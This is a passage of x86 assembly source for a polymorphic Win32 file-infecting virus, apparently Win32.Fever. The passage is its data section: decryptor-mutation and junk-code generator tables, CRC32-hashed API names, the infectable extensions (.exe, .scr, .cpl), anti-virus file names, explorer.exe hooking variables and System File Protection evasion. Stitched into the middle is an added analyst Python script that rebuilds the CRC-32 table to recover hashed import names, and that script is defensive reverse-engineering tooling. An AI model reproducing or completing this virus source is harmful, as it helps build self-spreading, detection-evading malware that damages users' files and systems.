X_INC_REG_WORD  db      02h,66h,48h,MAGIC_ENDSTR        ; dec ax
X_INC_REG_DWORD db      01h,48h,MAGIC_ENDSTR            ; dec eax
X_DEC_REG_BYTE  db      02h,0FEh,0C0h,MAGIC_ENDSTR      ; inc al
X_DEC_REG_WORD  db      02h,66h,40h,MAGIC_ENDSTR        ; inc ax
X_DEC_REG_DWORD db      01h,40h,MAGIC_ENDSTR            ; inc eax
X_NOT_REG_BYTE  db      02h,0F6h,0D0h,MAGIC_ENDSTR      ; not al
X_NOT_REG_WORD  db      03h,66h,0F7h,0D0h,MAGIC_ENDSTR  ; not ax
X_NOT_REG_DWORD db      02h,0F7h,0D0h,MAGIC_ENDSTR      ; not eax
X_ADD_REG_BYTE  db      01h,2Ch,MAGIC_ENDKEY            ; sub al,key
X_ADD_REG_WORD  db      02h,66h,2Dh,MAGIC_ENDKEY        ; sub ax,key
X_ADD_REG_DWORD db      01h,2Dh,MAGIC_ENDKEY            ; sub eax,key
X_SUB_REG_BYTE  db      01h,04h,MAGIC_ENDKEY            ; add al,key
X_SUB_REG_WORD  db      02h,66h,05h,MAGIC_ENDKEY        ; add ax,key
X_SUB_REG_DWORD db      01h,05h,MAGIC_ENDKEY            ; add eax,key
X_XOR_REG_BYTE  db      01h,34h,MAGIC_ENDKEY            ; xor al,key
X_XOR_REG_WORD  db      02h,66h,35h,MAGIC_ENDKEY        ; xor ax,key
X_XOR_REG_DWORD db      01h,35h,MAGIC_ENDKEY            ; xor eax,key

; =============================================================
; Format for each style-table entry:
;
; 00h -> dword -> address of generator
; 04h -> dword -> address of generated sub
;                 (00000000h if not yet generated)
;
; =============================================================

Style_Table     equ     $
                dd      offset Gen_Load_Ptr
                dd      00000000h
                dd      offset Gen_Load_Ctr
                dd      00000000h
                dd      offset Gen_Decrypt
                dd      00000000h
                dd      offset Gen_Next_Step
                dd      00000000h
                dd      offset Gen_Next_Ctr
                dd      00000000h

; =============================================================
; Generators for incrementing the index register
; =============================================================

Tbl_Idx_Up      equ     $
                dd      offset IdxUpWithAdd
                dd      offset IdxUpWithSub
                dd      offset IdxUpWithInc
                dd      offset IdxUpAddAdd
                dd      offset IdxUpAddSub
                dd      offset IdxUpSubSub
                dd      offset IdxUpSubAdd
NumIdxUp        equ     ($-Tbl_Idx_Up)/04h

; =============================================================
; Misc generators
; =============================================================

Tbl_Jmp_End     equ     $
                dd      offset JmpEndRegAdd
                dd      offset JmpEndRegSub
                dd      offset JmpEndRegXor
NumJmpEnd       equ     ($-Tbl_Jmp_End)/04h

Tbl_Call_Step   equ     $
                dd      offset CallStepAdd
                dd      offset CallStepSub
                dd      offset CallStepXor
NumCallStep     equ     ($-Tbl_Call_Step)/04h

TblDoFog        equ     $
                dd      offset DoFogAdd
                dd      offset DoFogSub
                dd      offset DoFogXor
NumFog          equ     ($-TblDoFog)/04h

TblFixFog       equ     $
                dd      offset FixFogAdd
                dd      offset FixFogSub
                dd      offset FixFogXor
NumFixFog       equ     ($-TblFixFog)/04h

; =============================================================
; Generators for decrementing the index register
; =============================================================

Tbl_Idx_Down    equ     $
                dd      offset IdxDownWithAdd
                dd      offset IdxDownWithSub
                dd      offset IdxDownDec
                dd      offset IdxDownAddAdd
                dd      offset IdxDownAddSub
                dd      offset IdxDownSubSub
                dd      offset IdxDownSubAdd
NumIdxDown      equ     ($-Tbl_Idx_Down)/04h

; =============================================================
; Garbage code generators
; =============================================================

Tbl_I_G         equ     $
                dd      offset Gen_Save_Code    ; clc stc cmc cld std
                dd      offset gen_mov_mem32    ; mov mem,reg32
                dd      offset gen_mov_mem16    ; mov mem,reg16
                dd      offset gen_mov_mem8     ; mov mem,reg8
                dd      offset gen_add_mem32    ; add mem,reg32
                dd      offset gen_add_mem16    ; add mem,reg16
                dd      offset gen_add_mem8     ; add mem,reg8
                dd      offset gen_sub_mem32    ; sub mem,reg32
                dd      offset gen_sub_mem16    ; sub mem,reg16
                dd      offset gen_sub_mem8     ; sub mem,reg8
                dd      offset gen_adc_mem32    ; adc mem,reg32
                dd      offset gen_adc_mem16    ; adc mem,reg16
                dd      offset gen_adc_mem8     ; adc mem,reg8
                dd      offset gen_sbb_mem32    ; sbb mem,reg32
                dd      offset gen_sbb_mem16    ; sbb mem,reg16
                dd      offset gen_sbb_mem8     ; sbb mem,reg8
                dd      offset gen_or_mem32     ; or mem,reg32
                dd      offset gen_or_mem16     ; or mem,reg16
                dd      offset gen_or_mem8      ; or mem,reg8
                dd      offset gen_and_mem32    ; and mem,reg32
                dd      offset gen_and_mem16    ; and mem,reg16
                dd      offset gen_and_mem8     ; and mem,reg8
                dd      offset gen_xor_mem32    ; xor mem,reg32
                dd      offset gen_xor_mem16    ; xor mem,reg16
                dd      offset gen_xor_mem8     ; xor mem,reg8
End_I_G         equ     $

Tbl_Garbage     equ     $
                dd      offset Gen_Save_Code    ; clc stc cmc cld std
                dd      offset g_MovReg32Imm    ; mov reg32,imm
                dd      offset g_MovReg16Imm    ; mov reg16,imm
                dd      offset g_MovReg8Imm     ; mov reg8,imm
                dd      offset g_XchgRegReg32   ; xchg reg32,reg32
                dd      offset g_XchgRegReg16   ; xchg reg16,reg16
                dd      offset g_XchgRegReg8    ; xchg reg8,reg8
                dd      offset g_MovRegReg32    ; mov reg32,reg32
                dd      offset g_MovRegReg16    ; mov reg16,reg16
                dd      offset g_MovRegReg8     ; mov reg8,reg8
                dd      offset g_Inc_Reg32      ; inc reg32
                dd      offset g_Inc_Reg16      ; inc reg16
                dd      offset g_Inc_Reg8       ; inc reg8
                dd      offset g_Dec_Reg32      ; dec reg32
                dd      offset g_Dec_Reg16      ; dec reg16
                dd      offset g_Dec_Reg8       ; dec reg8
                dd      offset g_MathRegImm32   ; math reg32,imm
                dd      offset g_MathRegImm16   ; math reg16,imm
                dd      offset g_MathRegImm8    ; math reg8,imm
                dd      offset g_Movzx_Movsx    ; movzx / movsx reg32,reg16
Save_Space      equ     $
                dd      offset gen_mov_mem32    ; mov mem,reg32
                dd      offset gen_mov_mem16    ; mov mem,reg16
                dd      offset gen_mov_mem8     ; mov mem,reg8
                dd      offset gen_add_mem32    ; add mem,reg32
                dd      offset gen_add_mem16    ; add mem,reg16
                dd      offset gen_add_mem8     ; add mem,reg8
                dd      offset gen_sub_mem32    ; sub mem,reg32
                dd      offset gen_sub_mem16    ; sub mem,reg16
                dd      offset gen_sub_mem8     ; sub mem,reg8
                dd      offset gen_adc_mem32    ; adc mem,reg32
                dd      offset gen_adc_mem16    ; adc mem,reg16
                dd      offset gen_adc_mem8     ; adc mem,reg8
                dd      offset gen_sbb_mem32    ; sbb mem,reg32
                dd      offset gen_sbb_mem16    ; sbb mem,reg16
                dd      offset gen_sbb_mem8     ; sbb mem,reg8
                dd      offset gen_or_mem32     ; or mem,reg32
                dd      offset gen_or_mem16     ; or mem,reg16
                dd      offset gen_or_mem8      ; or mem,reg8
                dd      offset gen_and_mem32    ; and mem,reg32
                dd      offset gen_and_mem16    ; and mem,reg16
                dd      offset gen_and_mem8     ; and mem,reg8
                dd      offset gen_xor_mem32    ; xor mem,reg32
                dd      offset gen_xor_mem16    ; xor mem,reg16
                dd      offset gen_xor_mem8     ; xor mem,reg8
                dd      offset g_Push_G_Pop     ; push reg / garbage / pop reg
                dd      offset g_Call_Cont      ; call / garbage / pop
                dd      offset g_Jump_U         ; jump / rnd block
                dd      offset g_Jump_C         ; jump conditional / garbage
                dd      offset gen_fake_crypt   ; fake decryptor instruction
End_Garbage     equ     $

; =============================================================
; PolyPush
; =============================================================

TblDoPush       equ     $
PushEbx         db      053h                    ; push ebx
PushEsi         db      056h                    ; push esi
PushEdi         db      057h                    ; push edi
PushEbp         db      055h                    ; push ebp

; =============================================================
; PolyPop
;
; The labels mirror TblDoPush slot for slot, but the bytes are
; the pops in reverse order, so walking both tables forward
; balances the stack.
; =============================================================

TblDoPop        equ     $
PopEbx          db      05Dh                    ; pop ebp
PopEsi          db      05Fh                    ; pop edi
PopEdi          db      05Eh                    ; pop esi
PopEbp          db      05Bh                    ; pop ebx

; ===========================================================================
; CRC32 of API names
; ===========================================================================

CrcKernel32             dd      00000000h       ; CRC32 of kernel DLL name
CrcGetProcAddr          dd      00000000h       ; this API takes special care
Crc32K32Apis            dd      NumK32Apis dup (00000000h)
Crc32ToolHelpApis       dd      NumToolHelpApis dup (00000000h)
Crc32PsApiApis          dd      NumPsApiApis dup (00000000h)
Crc32ImgHlpApis         dd      NumImgHlpApis dup (00000000h)
Crc32SfcApis            dd      NumSfcApis dup (00000000h)
Crc32User32ApisW9x      dd      NumUser32Apis dup (00000000h)
Crc32User32ApisWNT      dd      NumUser32Apis dup (00000000h)
Crc32_IsDebugPr         dd      00000000h
Crc32_RegServProc       dd      00000000h

; ===========================================================================
; CRC32 of infectable file extensions
; ===========================================================================

TblCrc32SzExt           equ     $
Crc32_SzExe             dd      00000000h
Crc32_SzScr             dd      00000000h
Crc32_SzCpl             dd      00000000h
NumberOfExt             equ     ($-TblCrc32SzExt)/04h

; ===========================================================================
; CRC32 of explorer.exe, user32.dll and the helper DLL names
; ===========================================================================

CrcSzExplorer           dd      00000000h
CrcSzUser32             dd      00000000h
CrcSzPsApi              dd      00000000h
CrcSzImgHlp             dd      00000000h
CrcSzSfc                dd      00000000h

; ===========================================================================
; Avoid some files from being infected
; ===========================================================================

Avoid_Tbl               dd      Avoid_Num dup (00000000h)

; ===========================================================================
; CRC32 of AV files
; ===========================================================================

TblCrc32Av              dd      NumberOfAv dup (00000000h)

; ===========================================================================
; End of CRC32-protected area
; ===========================================================================

SizeOfProtect           equ     $-Crc_Protect

; ===========================================================================
; End of virus image in files
; ===========================================================================

Inf_Size                equ     $-Viro_Sys

; ===========================================================================
; Seed for random number generator
; ===========================================================================

Rnd32_Seed              dd      00000000h

; ===========================================================================
; CRC32 lookup table
; ===========================================================================

Tbl_Crc32               dd      0100h dup (00000000h)
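Nothing in the image above imports by name: the stored values (Crc32K32Apis and friends, the extension and AV-name hashes) are CRC32s compared against names at run time, and the 256-entry Tbl_Crc32 is filled in before use. The following is an added analyst-side example, not code from the listing: a table-driven CRC-32 of the same shape, cross-checked against zlib, plus the reverse lookup one builds to recover hashed import names from a dump. The polynomial, initial value and final inversion are not stated on the page; the standard reflected CRC-32 (0xEDB88320, as in zlib/PKZIP) is assumed, as is hashing the exact-case export name without its terminator. The kernel32 candidates are the names from the EpK32Apis block below (the listing calls the last one a_GetVersionEx; the export is GetVersionExA).

```python
# Added example (analyst tooling), not part of the Win32.Fever source.
# Table-driven CRC-32 matching the listing's 256-entry table, with a
# reverse index for recovering API names from stored hashes.
import zlib

POLY = 0xEDB88320   # assumption: standard reflected CRC-32 polynomial


def build_crc32_table():
    """One entry per input byte value, the same shape as the 100h-dword table above."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = build_crc32_table()


def crc32(data, crc=0):
    """CRC-32 of `data` (bytes). Passing the previous result as `crc` chains buffers."""
    crc ^= 0xFFFFFFFF
    for b in data:
        crc = TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def matches_zlib(data):
    """Cross-check against the library implementation of the same polynomial."""
    return crc32(data) == (zlib.crc32(data) & 0xFFFFFFFF)


# Export names from the listing's EpK32Apis block, in table order.
KERNEL32_NAMES = [
    "CreateFileA", "CreateFileMappingA", "CreateProcessA", "CreateThread", "CloseHandle",
    "DeleteFileA", "ExitThread", "FindClose", "FindFirstFileA", "FindNextFileA",
    "FreeLibrary", "GetComputerNameA", "GetCurrentProcess", "GetDriveTypeA",
    "GetFileAttributesA", "GetLastError", "GetLocalTime", "GetLogicalDriveStringsA",
    "GetSystemDirectoryA", "GetVersionExA", "LoadLibraryA", "MapViewOfFile",
    "OpenFileMappingA", "OpenProcess", "ReadProcessMemory", "SetEndOfFile",
    "SetFileAttributesA", "SetFilePointer", "SetFileTime", "Sleep", "UnmapViewOfFile",
    "WriteProcessMemory",
]


def build_hash_index(names):
    """hash -> name, for recovering hashed imports from a memory or file dump."""
    return {crc32(n.encode("ascii")): n for n in names}


def resolve(hashes, index):
    """Map each stored hash to a name, or '<unknown>' when no candidate matches."""
    return [(h, index.get(h, "<unknown>")) for h in hashes]


if __name__ == "__main__":
    idx = build_hash_index(KERNEL32_NAMES)
    # Constructed input: two hashes we expect to hit and one that will not.
    for h, name in resolve([crc32(b"CreateFileA"), crc32(b"Sleep"), 0x12345678], idx):
        print(f"{h:08X}  {name}")
```

When the conventions differ from the assumptions (uppercase-folded names, a terminating NUL hashed in, a different initial value), the index simply misses; the fix is to regenerate it with the variant that reproduces one hash already confirmed by debugging the sample.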

; ===========================================================================
; kernel32 APIs
; ===========================================================================

; GetProcAddress API takes special care
a_GetProcAddress        dd      00000000h

EpK32Apis               equ     $
a_CreateFileA           dd      00000000h
a_CreateFileMappingA    dd      00000000h
a_CreateProcessA        dd      00000000h
a_CreateThread          dd      00000000h
a_CloseHandle           dd      00000000h
a_DeleteFileA           dd      00000000h
a_ExitThread            dd      00000000h
a_FindClose             dd      00000000h
a_FindFirstFileA        dd      00000000h
a_FindNextFileA         dd      00000000h
a_FreeLibrary           dd      00000000h
a_GetComputerNameA      dd      00000000h
a_GetCurrentProcess     dd      00000000h
a_GetDriveTypeA         dd      00000000h
a_GetFileAttributesA    dd      00000000h
a_GetLastError          dd      00000000h
a_GetLocalTime          dd      00000000h
a_GetLogicalDriveStringsA dd    00000000h
a_GetSystemDirectoryA   dd      00000000h
a_GetVersionEx          dd      00000000h
a_LoadLibraryA          dd      00000000h
a_MapViewOfFile         dd      00000000h
a_OpenFileMappingA      dd      00000000h
a_OpenProcess           dd      00000000h
a_ReadProcessMemory     dd      00000000h
a_SetEndOfFile          dd      00000000h
a_SetFileAttributesA    dd      00000000h
a_SetFilePointer        dd      00000000h
a_SetFileTime           dd      00000000h
a_Sleep                 dd      00000000h
a_UnmapViewOfFile       dd      00000000h
a_WriteProcessMemory    dd      00000000h
NumK32Apis              equ     ($-EpK32Apis)/04h

; only used when present
a_IsDebuggerPresent     dd      00000000h

hKernel32               dd      00000000h

; ===========================================================================
; Used to check current computer name
; ===========================================================================

SizeOfComputerName      dd      00000000h
SzComputerName          db      20h dup (00h)

; ===========================================================================
; Buffer used on misc routines
; ===========================================================================

ptes                    dd      00000000h       ; name cut off in the listing
BufStrFileName          db      MAX_PATH+01h dup (00h)

; ===========================================================================
; End of virus virtual image
; ===========================================================================

Size_Virtual            equ     $-Viro_Sys

; ===========================================================================
; Structure used by GetVersionEx (OSVERSIONINFO layout)
; ===========================================================================

dwOSVersionInfoSize     dd      00000000h
dwMajorVersion          dd      00000000h
dwMinorVersion          dd      00000000h
dwBuildNumber           dd      00000000h
dwPlatformId            dd      00000000h
szCSDVersion            db      80h dup (00h)

VER_PLATFORM_WIN32S             equ     00h
VER_PLATFORM_WIN32_WINDOWS      equ     01h
VER_PLATFORM_WIN32_NT           equ     02h

; ===========================================================================
; Variables used by the Windows 9x residency routines
; ===========================================================================

hSnapshot               dd      00000000h

ProcessEntry            equ     $               ; PROCESSENTRY32 layout
ProcEdwSize             dd      00000000h
ProcEcntUsage           dd      00000000h
ProcEth32ProcessID      dd      00000000h
ProcEth32DefaultHeapID  dd      00000000h
ProcEth32ModuleID       dd      00000000h
ProcEcntThreads         dd      00000000h
ProcEth32ParentProcessID dd     00000000h
ProcEpcPriClassBase     dd      00000000h
ProcEdwFlags            dd      00000000h
ProcEszExeFile          db      MAX_PATH dup (00h)
SizeOfProcessEntry      equ     ($-ProcessEntry)

ModuleEntry             equ     $               ; MODULEENTRY32 layout
ModEdwSize              dd      00000000h
ModEth32ModuleID        dd      00000000h
ModEth32ProcessID      dd      00000000h
ModEGlblcntUsage        dd      00000000h
ModEProccntUsage        dd      00000000h
ModEmodBaseAddr         dd      00000000h
ModEmodBaseSize         dd      00000000h
ModEhModule             dd      00000000h
ModEszModule            db      MAX_MODULE_NAME32+1 dup (00h)
ModEszExePath           db      MAX_PATH dup (00h)
SizeOfModuleEntry       equ     ($-ModuleEntry)

MAX_MODULE_NAME32       equ     255

; ===========================================================================
; Variables used by the Windows NT and Windows 2000 residency routines
; ===========================================================================

hProcess                dd      00000000h
hModule                 dd      00000000h
ProcessIdList           dd      20h dup (00000000h)
ModuleList              dd      20h dup (00000000h)
Explorer_mz_lfanew      dd      00000000h
Explorer_fh_SizeOfOptionalHeader dw 0000h
Explorer_fh_NumberOfSections     dw 0000h
Explorer_SectionHeader  db      IMAGE_SIZEOF_SECTION_HEADER dup (00h)
Explorer_DE_Import      dd      00000000h
Explorer_ImportDescriptor db    IMAGE_SIZEOF_IMPORT_DESCRIPTOR dup (00h)
Explorer_ID_Name        db      10h dup (00h)
ParseDllNameErrorProtection db  00h
Explorer_Hook           dd      00000000h
Explorer_Patch          dd      00000000h
Explorer_Init_Hook      dd      00000000h

; ===========================================================================
; This is the virus infection thread ID
; ===========================================================================

IF_ThreadId             dd      00000000h

; ===========================================================================
; This is used to locate system DLL files and load them without using
; names, only by means of CRC32
; ===========================================================================

a_SDLL_CRC32            dd      00000000h
SzSystemDir             db      MAX_PATH dup (00h)

; ===========================================================================
; ToolHelp APIs (Windows 9x only)
; ===========================================================================

EpToolHelpApis          equ     $
a_CreateToolhelp32Snapshot dd   00000000h
a_Process32First        dd      00000000h
a_Process32Next         dd      00000000h
a_Module32First         dd      00000000h
a_Module32Next          dd      00000000h
NumToolHelpApis         equ     ($-EpToolHelpApis)/04h

; ===========================================================================
; PSAPI APIs (Windows NT and Windows 2000 only)
; ===========================================================================

EpPsApiApis             equ     $
a_EnumProcessModules    dd      00000000h
a_EnumProcesses         dd      00000000h
a_GetModuleBaseNameA    dd      00000000h
a_GetModuleInformation  dd      00000000h
NumPsApiApis            equ     ($-EpPsApiApis)/04h

hPsApi                  dd      00000000h

; ===========================================================================
; ImageHlp APIs used to compute the new image checksum
; ===========================================================================

EpImgHlpApis            equ     $
a_CheckSumMappedFile    dd      00000000h
NumImgHlpApis           equ     ($-EpImgHlpApis)/04h

hImgHlp                 dd      00000000h

; ===========================================================================
; SFC APIs used by the virus to avoid Windows 2000 System File Protection
; ===========================================================================

EpSfcApis               equ     $
a_SfcIsFileProtected    dd      00000000h
NumSfcApis              equ     ($-EpSfcApis)/04h

hSfc                    dd      00000000h

; ===========================================================================
; user32 APIs (the address is the ANSI version if the target is running
; Windows 9x, or the wide version if running Windows NT)
; ===========================================================================

EpUser32Apis            equ     $
a_DefWindowProc         dd      00000000h
NumUser32Apis           equ     ($-EpUser32Apis)/04h

hUser32                 dd      00000000h

; ===========================================================================
; Handles over target files
; ===========================================================================

h_CreateFile            dd      00000000h
h_FileMap               dd      00000000h

; ===========================================================================
; Misc variables
; ===========================================================================

CurFileAttr             dd      00000000h
ChecksumPE              dd      00000000h
OldChecksum             dd      00000000h
Map_Is_Here             dd      00000000h
FileImport              dd      00000000h
ImportSH                dd      00000000h
Inject_Offs             dd      00000000h
Vir_Offset              dd      00000000h
Search_Raw              dd      00000000h
Host_Base               dd      00000000h
Virus_SH                dd      00000000h
Fix_Size                dd      00000000h
Raw_Align               dd      00000000h
K32CodeStart            dd      00000000h
K32CodeEnd              dd      00000000h

; ===========================================================================
; Poly engine uninitialized data
; ===========================================================================

; bits of Build_Flags
Crypt_Direction         equ     01h
Crypt_CmpCtr            equ     02h
Crypt_CDir              equ     04h
Crypt_Simplex           equ     10h
Crypt_Complex           equ     20h
Crypt_Fog               equ     40h

PtrToCrypt              dd      00000000h       ; pointer to area to encrypt
PtrToDecrypt            dd      00000000h       ; where to generate polymorphic decryptor
PtrToEP                 dd      00000000h       ; pointer to code entry-point once decrypted
SizeCrypt               dd      00000000h       ; size of area to encrypt
End_Value               dd      00000000h       ; index end value
Loop_Point              dd      00000000h       ; start address of decryption loop
Entry_Point             dd      00000000h       ; entry point to decryptor code
Decryptor_Size          dd      00000000h       ; size of generated decryptor
Disp2Disp               dd      00000000h       ; displacement over displacement
Condition_Ptr           dd      00000000h       ; pointer to jz/jnz instruction at loop end
XRnd1                   dd      00000000h
XRndReg                 dd      00000000h
XRndFixPtr              dd      00000000h
XRndMath                dd      00000000h
Counter_Mask            db      00h             ; mask of register used as counter
Recursive_Level         db      00h             ; garbage recursive layer
IsFirst                 db      00h             ; save registers only on 1st decryptor

Fake_Field              equ     $
Ptr_Disp                dd      00000000h       ; displacement from index
Fake_Ptr_Disp           dd      00000000h       ; ... and fake one
Crypt_Key               dd      00000000h       ; encryption key
Fake_Crypt_Key          dd      00000000h       ; ... and fake one
Build_Flags             db      00h             ; some decryptor flags
Fake_Build_Flags        db      00h             ; ... and fake one
Oper_Size               db      00h             ; size used (1 = byte, 2 = word, 4 = dword)
Fake_Oper_Size          db      00h             ; ... and fake one
Index_Mask              db      00h             ; mask of register used as index
Fake_Index_Mask         db      00h             ; ... and fake one

TblStdPshp              equ     $
                        dd      00000000h
                        dd      00000000h
                        dd      00000000h
                        dd      00000000h
PshpStepIndex           dd      00000004h dup (00000000h)

Num_DA                  equ     10h
NumberOfDataAreas       db      00h
Tbl_Data_Area           db      Num_DA*08h dup (00h)

; ===========================================================================
; SYSTEMTIME structure used by GetLocalTime
; ===========================================================================

Local_Time              equ     $
LT_Year                 dw      0000h
LT_Month                dw      0000h
LT_DayOfWeek            dw      0000h
LT_Day                  dw      0000h
LT_Hour                 dw      0000h
LT_Minute               dw      0000h
LT_Second               dw      0000h
LT_Milliseconds         dw      0000h

; ===========================================================================
; A RECT structure used in the payload
; ===========================================================================

WindowRect              equ     $
WR_Left                 dd      00000000h
WR_Top                  dd      00000000h
WR_Right                dd      00000000h
WR_Bottom               dd      00000000h

; ===========================================================================
; This is a WIN32_FIND_DATA structure used to infect files, and some
; auxiliary variables
; ===========================================================================

FileSizeOnDisk          dd      00000000h
FatSize                 dd      00000000h
FT_CreationTime         db      08h dup (00h)
FT_LastAccessTime       db      08h dup (00h)
FT_LastWriteTime        db      08h dup (00h)
h_Find                  dd      00000000h
DirectFindData          db      SIZEOF_WIN32_FIND_DATA dup (00h)

; ===========================================================================
; Used to retrieve current, Windows and system directories
; ===========================================================================

BufGetDir               db      MAX_PATH+01h dup (00h)

; ===========================================================================
; Used to get logical drives
; ===========================================================================

SizeOf_LDSB             equ     MAX_PATH
SzLogicalDrives         db      SizeOf_LDSB dup (00h)

; ===========================================================================
; End of virus image in allocated memory
; ===========================================================================

Alloc_Size              equ     $-Viro_Sys

VirSeg                  ends

                        end     host_code

When reposting, please credit the original source: https://www.9cbs.com/read-37444.html